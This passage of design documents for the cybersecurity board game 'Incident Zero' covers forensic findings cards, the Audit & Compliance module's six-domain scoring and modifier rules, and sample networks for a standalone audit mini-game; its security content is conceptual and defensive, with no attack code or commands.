╠════════════════════════════════════════════════════════════════╣
║ Chain of Custody: MODERATE ⚠                                   ║
║ - Evidence is lack of evidence (absences are hard to prove)    ║
║ - Comparison with known baselines shows anomalies              ║
║ - Log deletion tools detected and documented                   ║
║ - Admissible with supporting context (other evidence)          ║
╠════════════════════════════════════════════════════════════════╣
║ Discovery Source:                                              ║
║ - LOG-01/LOG-02: Gaps in logs (suspicious absences)            ║
║ - DISK-01/DISK-02: Deleted log files, anti-forensic tools     ║
║ - MEM-01/MEM-02: Anti-forensic process running in memory       ║
║ - MALW-01: Dynamic analysis shows self-deletion               ║
║ - MALW-02: Code analysis finds anti-forensic capabilities      ║
╠════════════════════════════════════════════════════════════════╣
║ Investigative Lead:                                            ║
║ "Attacker used anti-forensics. This actually helps because:    ║
║ - Proves attacker sophistication (means skilled opponent)      ║
║ - Indicates intentional harm (not accidental)                  ║
║ - Suggests what they're hiding (what logs were deleted?)       ║
║ - Helps attribution (anti-forensics technique is signature)    ║
║ - Can reconstruct from other sources (memory, network logs)"   ║
╠════════════════════════════════════════════════════════════════╣
║ Impact on Progress Meters:                                     ║
║ - Attribution: +20% (anti-forensic technique is signature)     ║
║ - Attack Chain: +10% (shows post-attack phase)                 ║
║ - Timeline: -10% (anti-forensics makes timeline harder)        ║
║ - Chain of Custody: +5% (proves intentional cover-up)          ║
╠════════════════════════════════════════════════════════════════╣
║ Feeds Into Modules:                                            ║
║ → HARDENING: "Immutable logging (cloud, WORM storage)"         ║
║ → NETWORK BUILDING: "Centralized log aggregation"              ║
║ → AUDIT: "Log integrity and anti-tampering controls"           ║
╚════════════════════════════════════════════════════════════════╝

Findings Cards (4 Total)

These are synthesis cards representing conclusions from forensic findings:

FIND-01: Threat Attribution Report

╔════════════════════════════════════════════════════════════════╗
║              FIND-01: THREAT ATTRIBUTION REPORT                ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Findings/Conclusions                                     ║
║ Triggered When: Attribution Confidence ≥ 70%                   ║
╠════════════════════════════════════════════════════════════════╣
║ FINDING:                                                       ║
║ Attack attributed to [Threat Group Name]                       ║
║ Confidence Level: [60-90% based on evidence]                   ║
║ Associated Techniques: [MITRE ATT&CK TTPs]                     ║
║ Previous Targets: [Industries/organizations previously targeted]║
║ Likely Motivation: [Financial gain, espionage, etc]            ║
║                                                                 ║
║ RECOMMENDATIONS:                                               ║
║ 1. Notify law enforcement (FBI, Interpol if international)     ║
║ 2. Share intelligence with industry ISACs                      ║
║ 3. Monitor for indicators of re-engagement                     ║
║ 4. Implement defenses targeting group's known TTPs             ║
║                                                                 ║
║ FEEDS INTO MODULES:                                            ║
║ → HARDENING: "Defense-in-depth against attributed group"       ║
║ → AUDIT & COMPLIANCE: "Threat model update with attributed group"║
║ → INCIDENT RESPONSE: "Playbook for future incidents from group"║
╚════════════════════════════════════════════════════════════════╝

FIND-02: Attack Surface Analysis

╔════════════════════════════════════════════════════════════════╗
║              FIND-02: ATTACK SURFACE ANALYSIS                  ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Findings/Conclusions                                     ║
║ Triggered When: Attack Chain ≥ 75%                             ║
╠════════════════════════════════════════════════════════════════╣
║ FINDING:                                                       ║
║ Entry Point: [Method used for initial compromise]              ║
║ Exploited Vulnerability: [CVE, weak auth, configuration gap]   ║
║ Escalation Point: [Where privilege escalation occurred]        ║
║ Lateral Movement Paths: [Systems accessed after pivot]         ║
║                                                                 ║
║ ROOT CAUSE:                                                    ║
║ - [Patch missing, configuration weakness, process gap]         ║
║                                                                 ║
║ RECOMMENDATIONS:                                               ║
║ 1. Patch entry-point vulnerability immediately                ║
║ 2. Implement detection for exploitation attempts               ║
║ 3. Restrict lateral movement (network segmentation)            ║
║ 4. Update architecture to prevent this attack path             ║
║                                                                 ║
║ FEEDS INTO MODULES:                                            ║
║ → HARDENING: "Specific technical hardening measures"           ║
║ → NETWORK BUILDING: "Architecture redesign to block attack path"║
║ → AUDIT: "Control gap remediation"                             ║
╚════════════════════════════════════════════════════════════════╝

FIND-03: Persistence Mechanisms Discovered

╔════════════════════════════════════════════════════════════════╗
║              FIND-03: PERSISTENCE MECHANISMS DISCOVERED        ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Findings/Conclusions                                     ║
║ Triggered When: Multiple persistence artifacts found           ║
╠════════════════════════════════════════════════════════════════╣
║ FINDING:                                                       ║
║ Primary Persistence: [Scheduled task, registry run, etc]       ║
║ Backup Persistence: [Redundant persistence methods]            ║
║ Dormancy: [How long could malware remain active undetected]    ║
║                                                                 ║
║ THREAT:                                                        ║
║ Attacker likely still has access (persistence remains active)  ║
║ - Malware calls home regularly (C2 connections)                ║
║ - Can re-establish access if initial access closed             ║
║ - May deploy additional payloads over time                     ║
║                                                                 ║
║ IMMEDIATE ACTIONS:                                             ║
║ 1. Fully remediate all discovered persistence mechanisms       ║
║ 2. Search for backup persistence (often multiple methods)      ║
║ 3. Monitor for re-establishment of access                      ║
║ 4. Assume attacker may have staged additional backdoors        ║
║                                                                 ║
║ FEEDS INTO MODULES:                                            ║
║ → HARDENING: "Persistence prevention and detection"            ║
║ → DISASTER RECOVERY: "Scope of remediation (how deep?)"        ║
║ → AUDIT: "Endpoint protection review"                          ║
╚════════════════════════════════════════════════════════════════╝

FIND-04: Investigative Gaps & Recommendations

╔════════════════════════════════════════════════════════════════╗
║              FIND-04: INVESTIGATIVE GAPS & RECOMMENDATIONS     ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Findings/Conclusions                                     ║
║ Triggered When: Investigation completes (Victory or Failure)   ║
╠════════════════════════════════════════════════════════════════╣
║ FINDING:                                                       ║
║ Key Questions Answered:                                        ║
║ - [ ] Attack entry point identified?                           ║
║ - [ ] Attacker motivation understood?                          ║
║ - [ ] Threat actor identified (attribution)?                   ║
║ - [ ] Data compromised: volume and sensitivity?                ║
║ - [ ] Current access status: eliminated or ongoing?            ║
║ - [ ] Persistence mechanisms: removed or active?               ║
║                                                                 ║
║ Remaining Questions:                                           ║
║ - [List specific unknowns from the investigation]              ║
║ - [What evidence gaps prevent complete understanding]          ║
║ - [What would close these gaps (more investigation, experts)]  ║
║                                                                 ║
║ NEXT STEPS:                                                    ║
║ 1. [If gaps remain: External forensics firm for deep analysis] ║
║ 2. [Law enforcement involvement for attribution/prosecution]   ║
║ 3. [Threat intelligence: share findings with industry]         ║
║ 4. [Lessons learned: update hardening/network architecture]    ║
║                                                                 ║
║ FEEDS INTO MODULES:                                            ║
║ → AUDIT & COMPLIANCE: "Post-incident review and control updates"║
║ → TRAINING: "Lessons learned session with all teams"           ║
║ → STRATEGIC: "Investment in detection/response capabilities"   ║
╚════════════════════════════════════════════════════════════════╝

Evidence Card Combinations

Fast Track (Quick Investigation - 4 Turns, respecting Durations)

Result: Quick understanding of attack progression without full attribution


Complete Investigation (5-6 Turns)

Result: Complete attack narrative with attribution


Advanced Investigation (7+ Turns)

Result: Expert-level forensic analysis, actionable threat intelligence


FAQ

Q: Can I discover the same Evidence card twice? A: No. Each Evidence card represents a unique finding. Multiple investigations may point to the same finding (confirming it), but you only gain progress once.

Q: What if I fail an investigation? A: No Evidence discovered, but you've used a turn and Budget. You can retry next turn (costs full Budget again), or move to different investigation.

Q: How do I use Evidence Cards to support my narrative? A: Reference specific Evidence cards when describing findings to Threat Orchestrator or in debrief. Chain of Custody rating shows admissibility in court.


Version History

docs/rules/module-audit-compliance.md

Audit & Compliance Module: Rules & Mechanics

Version: 2.2 - Playtest Edition Last Updated: October 2025

v2.2: this document's modifier table is canonical — the tables in cards/audit-compliance/ are generated from it. See v2.2 Playtest Edition Changes at the bottom.


Module Overview

The Audit & Compliance Module teaches players how security assessments reveal vulnerabilities that attackers will eventually exploit. Teams conduct a simulated third-party audit of their IT infrastructure, discovering gaps that will matter later.

Key Concept: "Auditors find what attackers will exploit." The findings from this module either inform hardening decisions (if successful) or create additional costs (if incident occurs).

Module Teaches: - Primary: Security assessment, compliance frameworks (NIST, CIS, PCI-DSS), vulnerability discovery - Secondary: Risk prioritization, remediation planning, audit-to-action translation

Integration Point: - Can be played standalone (teams audit a pre-built network) - OR as setup for Incident Response/Disaster Recovery (audit findings modify those modules) - See module-combinations.md for recommended sequences


Module Setup (10 minutes)

1. Choose Assessment Framework

Framework Focus Best For
NIST Cybersecurity Framework 5 Core Functions General organizations
CIS Critical Controls 18 Controls (CIS v8) Defense-focused
PCI-DSS Payment card security Retail/e-commerce
HIPAA Healthcare data Healthcare organizations
Multi-Framework Mix of above Realistic compliance

Key Point: Framework choice determines which audit domains are tested.

Budget note (v2.2): core-rules gives the Audit module a starting Budget of 100 — Budget (100) applies only when playing the optional Remediation follow-up cards (see cards/audit-compliance/expansion-deck/compliance-frameworks.md, remediation section); the assessment itself costs nothing.

2. Choose Assessment Scope

Scope Time Networks Evaluated
Basic 5 min One pre-built network
Standard 10 min One network from Network Building OR pre-built
Comprehensive 15+ min Multiple networks / multiple locations

3. Network Input

Option A: Use Pre-Built Network - Threat Orchestrator provides a sample network - Teams audit it without having built it - Focuses on audit skills, not network design

Option B: Use Network from Network Building Module - Teams audit the network they just built - Directly see consequences of earlier decisions - More integrated experience

Option C: Create Fictional Network via Narrative - Threat Orchestrator describes a scenario: "Your organization has email, web, database, and domain controller servers. Some are on-prem, some in cloud. You have a firewall but no IDS." - Teams audit based on description - Faster, requires less setup


Gameplay Loop (10 minutes)

Audit Structure

Threat Orchestrator (Acting as External Auditor) reviews the network and assesses 6 audit domains:

Domain 1: Network Segmentation & Isolation

Audit Question: "Does your network properly isolate critical systems from untrusted networks?"

Pass Criteria: - Implemented segmented architecture (3+ zones), AND - Deployed firewall between zones, AND - Critical systems (Database, Domain Controller) in separate zone from internet-facing systems

Fail Criteria: - Flat network (no segmentation), OR - Segmentation without firewall, OR - Critical systems on same zone as untrusted systems

If FAIL - Finding: - Name: Network Segmentation Gap - Risk Level: CRITICAL - Consequence in IR: Lateral movement easier (-1 to defending against NETWORK attacks) - Consequence in DR: Attacker access spreads to more systems (-10 DR budget penalty)

Narrative for Teams: "All of your systems are on the same network segment. Once an attacker gains access to one system, they can move freely between others."


Domain 2: Access Control & Identity Management

Audit Question: "Is your identity system (directory services, authentication, authorization) properly secured?"

Pass Criteria: - Domain Controller deployed, AND - Domain Controller on separate network segment, AND - Domain Controller not overloaded (≤2 services)

Fail Criteria: - No Domain Controller deployed, OR - Domain Controller on same segment as untrusted systems, OR - Domain Controller overloaded (3+ services)

If FAIL - Finding: - Name: Identity System Vulnerability - Risk Level: CRITICAL - Consequence in IR: Credential-based attacks easier (-1 to defending against CREDENTIAL_ABUSE attacks) - Consequence in DR: Full credential compromise; all user accounts compromised (-15 DR budget penalty)

Narrative for Teams: "Your identity system is overloaded with too many services and insufficient hardening. If compromised, attackers will have broad access to all user credentials."


Domain 3: Threat Detection & Incident Response

Audit Question: "Can you detect attacks when they happen? Do you have monitoring and alerting?"

Pass Criteria: - IDS or IPS deployed, AND/OR - SIEM system deployed, AND/OR - Email Gateway + Honeypot deployed (detection alternatives)

Fail Criteria: - None of the above detection systems deployed, OR - Only basic security devices with no central logging

If FAIL - Finding: - Name: Detection & Monitoring Gap - Risk Level: HIGH - Consequence in IR: Investigations slower (-1 to Investigation rolls; 12+ instead of 11+) - Consequence in DR: Breach undetected longer; more data stolen (-10 DR budget penalty)

Narrative for Teams: "You have no centralized logging or monitoring. When an attack happens, you won't know about it until data is already compromised."


Domain 4: Backup & Disaster Recovery

Audit Question: "Do you have functional backups? Can you recover from data loss or ransomware?"

Pass Criteria: - Backup System deployed, AND - Backup isolated on separate network, OR - Cloud backup configured, OR - Multiple hosting locations (on-prem + cloud redundancy)

Fail Criteria: - No Backup System deployed, OR - Single point of failure (all on-prem or all cloud)

If FAIL - Finding: - Name: Backup & Recovery Gap - Risk Level: CRITICAL (for ransomware/DR only) - Consequence in IR: None (network gap, not detection issue) - Consequence in DR: Ransomware unrecoverable; full rebuild required (-25 DR budget penalty)

Narrative for Teams: "You have no backup strategy. If ransomware hits, you cannot recover your data. You must either pay ransom or rebuild from scratch."


Domain 5: Third-Party Risk & Cloud Security

Audit Question: "Are your cloud systems and third-party integrations properly secured and isolated?"

Pass Criteria: - Cloud systems isolated on private network (VPN), AND - Cloud systems monitored/managed, AND - Credentials for cloud access securely managed

Fail Criteria: - Cloud systems internet-exposed, OR - No monitoring of cloud services, OR - Credentials stored locally for cloud access

If FAIL - Finding: - Name: Cloud Security Gap - Risk Level: HIGH - Consequence in IR: Cloud-based attacks easier (-1 to defending against WEB_EXPLOIT attacks) - Consequence in DR: Cloud compromise requires cloud provider recovery; slow remediation (-20 DR budget penalty)

Narrative for Teams: "Your cloud systems are internet-accessible without protection. Any attacker can directly target your cloud infrastructure."


Domain 6: Security Operations & Monitoring

Audit Question: "Do you have centralized logging, monitoring, and security operations capability?"

Pass Criteria: - SIEM system deployed, OR - Email Gateway + IDS deployed (combined monitoring)

Fail Criteria: - No SIEM or equivalent centralized logging

If FAIL - Finding: - Name: Security Operations Gap - Risk Level: MEDIUM - Consequence in IR: Investigations slower (-1 to Investigation rolls) - Consequence in DR: Forensic analysis slow; can't determine breach scope (-5 DR budget penalty)

Narrative for Teams: "You have no centralized place to view security events. When an attack happens, investigators must pull data from multiple sources manually."


Audit Report Generation

Creating the Formal Findings Report

After all 6 domains are assessed, Threat Orchestrator produces an Audit Findings Report:

SECURITY AUDIT FINDINGS REPORT

Organization: [Name]
Assessment Date: [Date]
Framework: [Framework used]
Auditor: [Your name / External firm]

═══════════════════════════════════════════

DOMAIN ASSESSMENT SUMMARY:

✓ PASS - Network Segmentation & Isolation
  Observation: Network properly segmented with firewalls between zones.
  Assessment: Risk is LOW for lateral movement.

✗ FAIL - Access Control & Identity Management
  Finding: Domain Controller overloaded with excessive services.
  Risk: If DC compromised, entire identity system at risk.
  Severity: CRITICAL
  Recommendation: Isolate DC to minimal required services.

✓ PASS - Threat Detection & Incident Response
  Observation: SIEM system deployed with centralized logging.
  Assessment: Good detection capability.

✗ FAIL - Backup & Disaster Recovery
  Finding: No backup system deployed.
  Risk: Data loss unrecoverable; ransomware response limited to ransom/rebuild.
  Severity: CRITICAL
  Recommendation: Deploy backup system immediately.

✓ PASS - Third-Party Risk & Cloud Security
  Observation: Cloud systems properly isolated on private network.
  Assessment: Cloud security posture adequate.

✗ FAIL - Security Operations & Monitoring
  Finding: No centralized logging platform.
  Risk: Incident investigation will be slow and manual.
  Severity: HIGH
  Recommendation: Deploy SIEM or equivalent centralized logging.

═══════════════════════════════════════════

FINAL SCORE: 3/6 DOMAINS PASS

Overall Assessment: CONCERNING GAPS IDENTIFIED

Summary: Organization has adequate network and cloud security but lacks:
1. Proper identity system isolation
2. Backup/recovery capability
3. Centralized monitoring

Impact Estimate:
- If attack occurs: Detection delayed, recovery impossible without ransom
- Estimated cost to remediate findings: ~$40K (modest investment)
- Estimated cost of breach due to these gaps: ~$500K+ (significant exposure)

Recommendation Priority:
1. Deploy backup system (prevent ransomware catastrophe)
2. Isolate Domain Controller (prevent credential compromise)
3. Centralize logging (speed up incident response)

Audit Scoring

One Rubric (v2.2): PASS/FAIL is primary

PASS/FAIL per domain (X/6) is the primary score. Star ratings (1-5★) are flavor for narrative reports, with this fixed mapping:

1-2★ = FAIL · 3★+ = PASS · "PARTIAL" counts as FAIL

Optional (v2.2): a 5★ (exemplary) rating in Detection grants +1 to Incident Response investigation rolls if IR is played later.

Final Audit Score

Teams receive a score reflecting their infrastructure quality:

Score Assessment Interpretation
6/6 PASS Enterprise-Grade No modifiers carried into later modules; strong foundation
5/6 PASS Strong Security -1 modifier to one attack type in IR
4/6 PASS Adequate Security -1 modifier to two attack types in IR
3/6 PASS Concerning Gaps -1 modifier to three attack types; IR easier
Below 3/6 High Risk Multiple -1 modifiers; IR much easier; DR much costlier

Narrative Interpretation

6/6 Pass: "Your organization demonstrates strong security practices across all domains. While no system is perfect, you have implemented key controls and best practices."

4-5/6 Pass: "Your organization has good foundational security but should prioritize remediation of identified gaps. Most critical systems are protected, but some exposure remains."

3/6 Pass: "Your organization has significant security gaps that create real risk. Multiple critical domains require attention. If an incident occurs, you will face challenges."

Below 3/6: "Your organization has critical gaps across multiple domains. Significant investment needed to meet baseline security standards."


Audit Findings as Attack Modifiers

How Audit Failures Affect Other Modules

When audit findings exist and other modules are played:

In Incident Response Module:

Each FAIL finding creates a -1 modifier (one per gap — canonical, v2.2) to the relevant roll:

Audit Finding IR Modifier Affected Threat Type
Segmentation Gap -1 to NETWORK defenses Lateral movement attacks easier
Identity Gap -1 to CREDENTIAL_ABUSE defenses Credential attacks easier
Detection Gap -1 to Investigation rolls Finding threats takes longer (11+ becomes 12+)
Backup Gap No IR effect (Matters in Disaster Recovery)
Cloud Gap -1 to WEB_EXPLOIT defenses Web/API attacks easier
Operations Gap -1 to Investigation rolls Forensic investigation slower

Example: Segmentation Gap Active in IR

INCIDENT RESPONSE PHASE:

Team's Threat: Lateral Movement via SMB
Base roll needed: 11+
Audit Modifier: -1 (Segmentation Gap)
Effective roll needed: 12+

Team's Defense: Network Segmentation (newly deployed)
Roll: 14 + 2 (justification) = 16
Result: SUCCESS (16 ≥ 12)

TO Narrative: "Your network segmentation worked perfectly, stopping the
lateral movement that would have been trivial in an unsegmented network."

In Disaster Recovery Module:

Each FAIL finding is a penalty subtracted from the DR starting budget (this table is canonical — v2.2):

Audit Finding DR Budget Penalty
Segmentation Gap -10 Budget (attacker spreads to more systems)
Identity Gap -15 Budget (full credential compromise)
Detection Gap -10 Budget (dwell time longer; more data stolen)
Backup Gap -25 Budget (no recovery option; expensive rebuild)
Cloud Gap -20 Budget (cloud provider recovery needed)
Operations Gap -5 Budget (forensic investigation slow)

Cap (v2.2): the total gap penalty applied to a subsequent module's budget is capped at -30.

Example: Multiple Gaps in DR (v2.2)

DISASTER RECOVERY PHASE:

Teams start with 50 crisis budget (DR 50; for reference, IR starts at 100).

Audit Failures from earlier assessment:
- Segmentation Gap: -10
- Detection Gap: -10
- Backup Gap: -25

Raw Gap Penalty: -45 -> capped at -30

Available Crisis Budget: 50 - 30 = 20

With 20 Budget the team can still afford the mandatory beats
(cheapest mandatory path is 29 -> they must lean on the free
Holding Statement and skip actions), but the response will be
thin. Outcome: heavy pressure, likely reputation damage.

Integration with Other Modules

Audit as Setup for Incident Response

Recommended Flow: Audit → Incident Response

  1. Conduct Audit (10 minutes)
  2. Identify 3-5 gaps in network

  3. Generate Modifiers (2 minutes)

  4. Each gap becomes a -1 modifier to relevant defense in IR

  5. Play Incident Response (35-40 minutes)

  6. Teams discover that audit findings predicted attack vectors
  7. Audit gaps make IR harder
  8. Teams gain appreciation for audit value

  9. Debrief (10 minutes)

  10. Discuss how audit findings manifested as attack vectors
  11. Real-world connection to breach investigations

Audit as Setup for Disaster Recovery

Recommended Flow: Audit → [Incident Response] → Disaster Recovery

  1. Conduct Audit (10 minutes)
  2. Identify gaps (particularly Backup Gap and Detection Gap)

  3. Skip or Lose IR (optional)

  4. Assume attackers breached and incident was NOT detected

  5. Play Disaster Recovery (30-35 minutes)

  6. Each audit gap increases crisis costs
  7. Teams discover backup gap = ransomware unrecoverable
  8. Teams discover detection gap = dwell time was 48+ hours

  9. Debrief (10 minutes)

  10. Discuss financial impact of audit failures
  11. Calculate total incident cost

Audit as Learning Tool (Standalone)

Play Just the Audit Module (as independent learning)


Tips for Threat Orchestrators

Before the Audit

  1. Choose framework - NIST/CIS/PCI-DSS based on organization/industry
  2. Select network - Pre-built OR from Network Building OR fictional
  3. Prepare assessment checklist - Know pass/fail criteria for each domain
  4. Have findings report template - For consistent, professional output

During the Audit

  1. Walk through systematically - Each domain, one at a time
  2. Explain reasoning - "You passed segmentation because you have firewalls between zones"
  3. Use NIST/CIS language - Frame findings in recognized compliance framework
  4. Be fair - Audit findings should be accurate, not arbitrary
  5. Take notes - Document what you see for the formal report

After the Audit

  1. Create findings report - Professional document teams can reference
  2. Calculate score - X/6 domains pass
  3. Identify modifiers - Which audit gaps will affect Incident Response
  4. Estimate remediation costs - Budget and timeline to fix findings
  5. Explain real-world connections - Compare audit process to actual assessments (SOC 2, ISO 27001, etc.)

Sample Scenarios

Scenario 1: "Startup Audit" (Beginner)

Network Characteristics: - Flat network (no segmentation) - Email, web, database on same servers (overloaded) - No backup system - No SIEM or monitoring - All on-premises

Expected Audit Result: - 1-2/6 domains pass - Multiple CRITICAL findings - High remediation cost - Team learns value of basics (backup, monitoring)


Scenario 2: "Mid-Market Audit" (Intermediate)

Network Characteristics: - Segmented network with firewall - Dedicated servers for critical functions - Backup system present - IDS deployed but no SIEM - Hybrid on-prem/cloud

Expected Audit Result: - 4/6 domains pass - 2 MEDIUM findings (monitoring, cloud config) - Moderate remediation cost - Team learns importance of comprehensive monitoring


Scenario 3: "Enterprise Audit" (Advanced)

Network Characteristics: - Fully isolated network architecture - Dedicated hardened servers - Comprehensive backup strategy - SIEM + IDS deployed - Cloud properly secured

Expected Audit Result: - 5-6/6 domains pass - 0-1 minor findings - Low remediation cost - Team learns value of comprehensive program


Extensions & Variations

Variation 1: Regulatory Compliance Specific

Focus audit on specific compliance requirement: - PCI-DSS: Focus on payment card handling, encryption, access control - HIPAA: Focus on healthcare data protection, audit logs, access management - SOC 2: Focus on security, availability, confidentiality controls - GDPR: Focus on data protection, breach notification, privacy

Each framework has different pass/fail criteria.


Variation 2: Continuous Auditing

Run audit multiple times with team improvements: 1. Initial audit (baseline) 2. Team makes improvements based on findings 3. Follow-up audit (measure improvement) 4. Calculate improvement % and cost-benefit


Variation 3: Threat Model Audit

Instead of compliance framework, audit against specific threat profile: - "This organization faces nation-state threat" → Audit for advanced detection - "This organization handles PHI data" → Audit for healthcare security - "This organization processes credit cards" → Audit for PCI-DSS - "This organization is critical infrastructure" → Audit for resilience


Quick Reference: Audit Domains & Consequences (canonical, v2.2)

Domain PASS Meaning FAIL Consequence (IR) FAIL Consequence (DR)
Segmentation Good isolation -1 to NETWORK defense -10 budget
Identity Proper AC -1 to CREDENTIAL_ABUSE defense -15 budget
Detection Good monitoring -1 to Investigation -10 budget
Backup Recovery capable None -25 budget
Cloud Secure cloud -1 to WEB_EXPLOIT defense -20 budget
Operations Good logging -1 to Investigation -5 budget

Cap (v2.2): total DR budget penalty capped at -30. Star flavor mapping: 1-2★ = FAIL, 3★+ = PASS, PARTIAL = FAIL.


Need Help?


v2.2 Playtest Edition Changes

  1. One canonical modifier table. This document's table is authoritative: DR budget penalties Segmentation -10 / Identity -15 / Detection -10 / Backup -25 / Cloud -20 / Ops -5, and one -1 IR modifier per gap. The tables in cards/audit-compliance/core-deck/audit-domain-cards.md and cards/audit-compliance/README.md are regenerated from it. One-off mechanics that existed nowhere else ("+5 turn penalty", "+1 escalation point", "-2 modifier", "+1 difficulty") are deleted or folded into the canonical -1-per-gap rule.
  2. Cap added: the total gap penalty applied to a subsequent module's budget is capped at -30. The unexplained "from 120 to 190" example was replaced with real budgets (DR 50, IR 100).
  3. One scoring rubric: PASS/FAIL per domain (X/6) is primary. Stars are flavor with a fixed mapping — 1-2★ = FAIL, 3★+ = PASS, "PARTIAL" counts as FAIL — printed here, on the domain cards, and in the standalone guide. Optional: 5★ in Detection grants +1 to IR investigation rolls if IR is played later.
  4. Budget note: the module's core-rules Budget (100) applies only to the optional Remediation follow-up cards; the assessment itself costs nothing.
  5. Fact corrections: CIS "20 Core Controls" → 18 (CIS v8) everywhere; NIST CSF category codes corrected in the expansion deck (Protect = PR.AC/PR.AT/PR.DS/PR.IP/PR.MA/PR.PT; Respond = RS.RP/RS.CO/RS.AN/RS.MI/RS.IM); segmentation cites PR.AC-5; vendor risk cites ID.SC; incident response is CIS Control 17 (v8).
  6. Card counts corrected: expansion deck is 19 cards (11 framework + 8 remediation); CIS section is 3 cards; HIPAA/SOC 2 moved to "Planned".
  7. Play aids: scoring reference card, audit worksheet, and judge guide are moving to the print pack (coming); an inline text audit worksheet is included in the standalone guide so it is playable today.

Audit & Compliance Module - Rules & Mechanics Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition

docs/standalone-games/audit-compliance.md

Incident Zero: Compliance Audit Standalone Mini-Games

Three Variations of Security Assessment Gameplay

Version: 2.2 - Playtest Edition — answer keys now follow the printed criteria; PASS/FAIL (X/6) is the primary score (stars: 1-2★ = FAIL, 3★+ = PASS, PARTIAL = FAIL). See docs/rules/module-audit-compliance.md for the canonical modifier table.


Overview

Compliance Audit Standalone offers three distinct game modes that can be played independently:

  1. Variation A: Pre-Built Networks (15-25 minutes) - Audit existing networks
  2. Variation B: Random Network Generation (25-35 minutes) - Generate network, then audit
  3. Variation C: Audit the Auditor Debate (20-30 minutes) - Interactive audit challenge

Common Theme: Teams understand how audits find vulnerabilities that attackers will exploit.

Best For: - Standalone 20-35 minute sessions - Teaching audit frameworks - Understanding security gaps - Before/after comparison with the Incident Response module - Competitive assessment skills


VARIATION A: PRE-BUILT NETWORKS

"Audit the Sample Networks"

Duration: 15-25 minutes
Players: 1-4 teams
Difficulty: Easy (low cognitive load)
Best For: Quick session, first-time audit introduction


Concept

"Three organizations have submitted their infrastructure for audit. Review each one and score their security posture. Which has the best design? Which is most vulnerable?"

Teams receive 3 pre-built network descriptions and audit them against a 6-domain framework. Compare results and discuss why vulnerabilities matter.


Game Materials

Pre-Built Sample Networks (3 total)

SAMPLE NETWORK 1: "StartUp Tech"

INFRASTRUCTURE DESCRIPTION:

Startup Tech is a 50-person web development company.
Cloud-first approach, minimal on-premises systems.

DEPLOYMENT:
- Web Server (Cloud - AWS): Hosts company website and app portal
- Database Server (Cloud - AWS RDS): Customer data, 100K records
- Development Server (Cloud - AWS EC2): Dev/test environment
- Domain Controller (On-Prem): AD for user identity (1 small server)
- File Server (On-Prem): Shared documents
- Email Server (Cloud - Microsoft 365): Email via SaaS provider

SECURITY DEVICES:
- Email Gateway: None (using Microsoft 365 default)
- Firewall: AWS Security Groups (cloud provider native)
- IDS/IPS: None
- SIEM: None
- WAF: None
- Backup: AWS automated snapshots + Microsoft 365 retention
- VPN: None (all cloud-native, no remote access needed)

NETWORK ARCHITECTURE:
- Hybrid (50% Cloud, 50% On-Prem)
- Cloud systems accessible via internet (all public IP)
- On-prem systems on isolated LAN
- No network segmentation between cloud and on-prem

HOSTING:
- 50% AWS (web, database, dev)
- 50% On-Premises (AD, file sharing)

SECURITY POSTURE:
- No perimeter firewall monitoring
- Cloud infrastructure: AWS default security (basic)
- On-prem infrastructure: Minimal controls
- Identity: Single AD instance (critical point)
- No incident detection
- Backups functional but not tested

SAMPLE NETWORK 2: "Mid-Market Corp"

INFRASTRUCTURE DESCRIPTION:

Mid-Market Corp is a 200-person financial services company.
Balanced on-premises and cloud, mature IT operations.

DEPLOYMENT:
- Email Server (On-Prem): Exchange 2019
- Web Server (Cloud - Azure): Public website + customer portal
- Database Server (On-Prem): SQL Server, customer data, 1M records
- File Server (On-Prem): Network file shares, active collaboration
- Domain Controller (On-Prem): AD + LDAP, 200 users
- Development Server (Cloud - Azure): Dev/test
- Backup System (On-Prem): Backup appliance, off-site replication
- Legacy System (On-Prem): 15-year-old accounting system

SECURITY DEVICES:
- Firewall: Cisco ASA (perimeter) + internal segmentation firewall
- Email Gateway: Proofpoint (phishing/malware filter)
- IDS: Suricata (network-based detection)
- IPS: None (IDS only)
- SIEM: Splunk (centralized logging)
- WAF: AWS WAF (in front of web server)
- VPN: Cisco AnyConnect (remote access)
- Honeypot: None

NETWORK ARCHITECTURE:
- Segmented (3 zones: DMZ, Internal, Finance)
- Firewalls enforce zone boundaries
- On-prem systems segregated from cloud
- Cloud systems on private network (not public internet)

HOSTING:
- 40% On-Premises (core business systems)
- 60% Cloud (web, dev, supplementary)

SECURITY POSTURE:
- Perimeter monitoring active (IDS)
- Email filtering active
- Centralized logging (SIEM)
- Remote access controlled (VPN)
- Backup and recovery tested
- Legacy system isolated but unpatched

SAMPLE NETWORK 3: "Enterprise Bank"

INFRASTRUCTURE DESCRIPTION:

Enterprise Bank is a 1000+ person financial institution.
Highly regulated (PCI-DSS, HIPAA), on-premises focused.

DEPLOYMENT:
- Email Server (On-Prem): Custom hardened system + redundancy
- Web Server (Cloud/Hybrid): DMZ layer for customer portal
- Database Server (On-Prem): Oracle RAC, 500M+ records, air-gapped
- File Server (On-Prem): Multiple redundant file servers by department
- Domain Controller (On-Prem): Multiple DCs, LDAP + Kerberos, hardened
- Development Server (On-Prem): Isolated dev network, no access to prod
- Backup System (On-Prem): Multiple backup systems, offline vault, geographically distant
- Cloud Workload (Limited): Only non-sensitive workloads

SECURITY DEVICES:
- Firewall: Multiple Palo Alto networks (perimeter + internal + cloud boundary)
- Email Gateway: Proofpoint + internal inspection
- IDS: Multiple IDS systems (network + host-based)
- IPS: Palo Alto IPS (active blocking)
- SIEM: Splunk + IBM QRadar (redundant)
- WAF: F5 WAF (multi-layer)
- VPN: Multiple VPN concentrators, MFA required
- Honeypot: Internal honeypot network (3 decoy systems)
- Network Segmentation: Microsegmentation between critical systems
- Intrusion Prevention: Advanced threat prevention

NETWORK ARCHITECTURE:
- Fully Isolated (10+ security zones)
- Each zone has firewall enforcement
- Zero-trust network access
- Air-gapped critical systems
- Private clouds only (no public internet access)

HOSTING:
- 95% On-Premises (regulatory requirement)
- 5% Cloud (non-critical, isolated)

SECURITY POSTURE:
- Comprehensive logging (multiple SIEM)
- Advanced threat detection (IDS/IPS + honeypot)
- Incident response ready
- Backup and recovery tested quarterly
- All systems hardened per NIST guidelines
- Compliance audited annually (PCI-DSS, SOX)

Audit Assessment Framework

The 6-Domain Audit

